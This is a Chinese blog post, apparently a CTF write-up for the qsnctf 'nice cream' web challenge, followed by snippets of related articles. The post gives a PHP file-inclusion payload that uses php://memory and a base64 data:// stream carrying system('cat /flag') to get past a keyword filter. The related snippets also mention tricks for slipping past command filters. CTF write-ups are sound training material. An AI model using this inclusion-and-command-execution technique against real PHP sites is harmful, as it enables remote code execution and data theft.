qsnctf nice cream wp

最新推荐文章于 2023-12-23 16:59:10 发布
最新推荐文章于 2023-12-23 16:59:10 发布
阅读量776 收藏
点赞数 1
分类专栏: CTF-WEB 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/127767114
版权

启动环境
在这里插入图片描述
开局一张图,看看源码
在这里插入图片描述
上面那个两次base64解码后得到明文flag
第二个base64解码后得到明文3Lu
尝试访问flag.php
在这里插入图片描述
代码审计
存在文件包含
由于这里fopen是r+
在这里插入图片描述
我们传入files的值必须是可读写的
考虑php://memory php?//temp
这样files的参数就有了

继续看,有一定的过滤,过滤content中的关键字
然后
在这里插入图片描述
将用户传入content的值写入之前指定的流中
然后包含传入data的参数
构造如下payload

files=php://memory&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==

或者

files=php://temp&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==

拿到flag

那么还剩的那个3Lu有什么用呢

丨Arcueid丨
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
青少年qsnctf [登录试试] 攻略
小苏
11-30 1057
青少年CTF训练平台-Web-Easy-登录试试
Nice Troubleshooting
03-16
【Nice Engage解决方案详解】 Nice Engage是一款由NICE公司提供的综合联络中心解决方案,它专为优化客户服务体验而设计。该系统集成了先进的录音技术,能够帮助企业和组织进行高效的通话记录和数据分析,从而提高...
PHP特性全集(qsnctf
2301_76718200的博客
11-26 527
array_reverse(scandir(current(localeconv()))): 这个部分先获取目录中的文件列表,然后使用 array_reverse 函数将文件列表反转,使得最后一个文件成为第一个。current(localeconv()): 这个部分获取 localeconv() 函数的返回值,然后使用 current 函数返回关联数组的第一个元素的值,即本地化设置的货币符号。localeconv(): 这是一个PHP函数,返回包含当前本地化设置的信息的关联数组。注意:flag是动态的。
qsnctf BASE wp
arcuied
11-30 164
qsnctf BASE wp
qsnctf CheckMe06 wp
arcuied
11-10 378
qsnctf CheckMe06 wp
qsnctf CheckMe08 wp
arcuied
11-10 371
qsnctf CheckMe08 wp
NICE Automation Advanced自动化机器人
10-11
《NICE Advanced自动化机器人:深入理解与实践》 NICE Automation Advanced自动化机器人是一款先进的业务流程优化工具,它专注于桌面自动化和机器人自动化解决方案的实施。这款软件结合了理论、实时演示和动手实践...
仿nice标签
11-23
在Android开发中,"仿nice标签"通常是指创建一种类似社交网络中常见的标签展示效果,如用户兴趣标签、话题标签等。这些标签可以是可点击的,并且在界面上有特定的视觉样式,比如圆角矩形、背景色以及动态添加和移除...
shell脚本nicenumber实现代码
09-15
### Shell脚本 nicenumber 实现代码解析 #### 概述 本文将详细介绍一个名为 `nicenumber` 的Shell脚本的功能与实现细节。该脚本的主要目的是接收一个数字作为输入,并将其转换为易于阅读的格式,即在数千位之间添加...
条件下拉筛选 NiceSpinner
02-18
"条件下拉筛选 NiceSpinner"就是这样一个组件,它为用户提供了一个方便的方式来过滤和选择数据。NiceSpinner是一个增强版的Spinner,它不仅提供了基本的下拉选择功能,还增加了诸如点击触发、条件筛选等高级特性,极...
qsnctf easy_web wp
arcuied
11-10 616
qsnctf easy_web wp
qsnctf 哥哥打篮球 wp
arcuied
11-10 1722
qsnctf 哥哥打篮球 wp
qsnctf ping me2 wp
arcuied
11-09 224
qsnctf ping me2 wp
青少年CTF-qsnctf-Web-include01&include02(多种方法-知识点较多-建议收藏!)
最新发布
m0_73734159的博客
12-23 1833
php://data协议是PHP中的一种特殊协议,可以在包含函数中被用来执行一些特殊的操作。它没有条件限制,但仅能用于在CTF(Capture The Flag)中读取本地文件,且不受allow_url_fopen与allow_url_include的影响。php://input是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容。因为根目录下只有flag这一个f开头的文件 所以查看的就是flag文件的内容咯。题目描述:你能否获取Flag呢,flag格式为:qsnctf{xxx}。
青少年ctf nice cream ctf训练平台 文件包含 include
weixin_69830800的博客
06-08 286
$fp = fopen($_GET['files'],'r+'); if(preg_match("/php|file|http|eval|exec|system|popen|flag|\|\"|\'/i",$_GET['content'])){ die("hacker"); } fputs($fp,$_GET['content']); rewind($fp); $data=stream_get_contents($fp); include($data); ?>
青少年CTFqsnctf的部分WP
Fab1an的博客
08-23 517
这道题目涉及了一些基本的Web安全知识和PHP代码审计。让我来分步骤解释这个题目的解法:页面结构:代码开头通过HTML输出一个表单,要求用户输入一个 "key"。同时,代码会根据用户的输入在后台进行处理。表单提交:用户需要在表单中输入一个 "key",然后点击 "Submit" 按钮将数据提交到index.php这个页面。index.php因此,你需要在表单中输入经过Base64编码和URL编码的 "qsnctf",并将其解码为长度为6的 "key"。
青少年CTF - Misc - 上号 Wp WriteUp
zxsctf的博客
10-01 1647
发现最下方访问8000端口的网页的时候,请求了shanghao.zip,我们可以通过http对象窗口进行导出。010Editor打开,在文件末尾发现qsnctf的字眼,怀疑是某种密码。我们尝试使用steghide工具,进行解密,得到了flag.txt。平台名称:青少年CTF训练平台(原中学生CTF平台)声明:题目为平台原创,如需搬运请告知平台负责人。工具:Wireshark、steghide。文件->导出对象->http对象。下载附件,发现是一个流量包。打开后得到一个jpg图片。导出之后得到压缩包。
青少年CTF-qsnctf-Web-PingMe02
m0_73734159的博客
12-20 537
IFS是Shell中的一个环境变量,它代表了Shell的内部字段分隔符。IFS的默认值是空格符、制表符和换行符,这些字符用于将输入行分割成字段,以便Shell可以对它们进行处理。在某些情况下,如果需要以空格为分隔符进行分割,可以使用IFS代替空格。"*"这个符号是查看f开头的所有文件,因为根目录下只有flag这一个以f开头的文件,故可以用此符号进行绕过。又是一道Ping题目诶!flag关键字被过滤。列出根目录下的所有目录和文件。使用命令more绕过过滤。不能有空格,空格被过滤。使用特定符号绕过过滤。
Python一个超好用的CTF库
m0_60571990的博客
03-14 1030
Python一个超好用的CTF库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值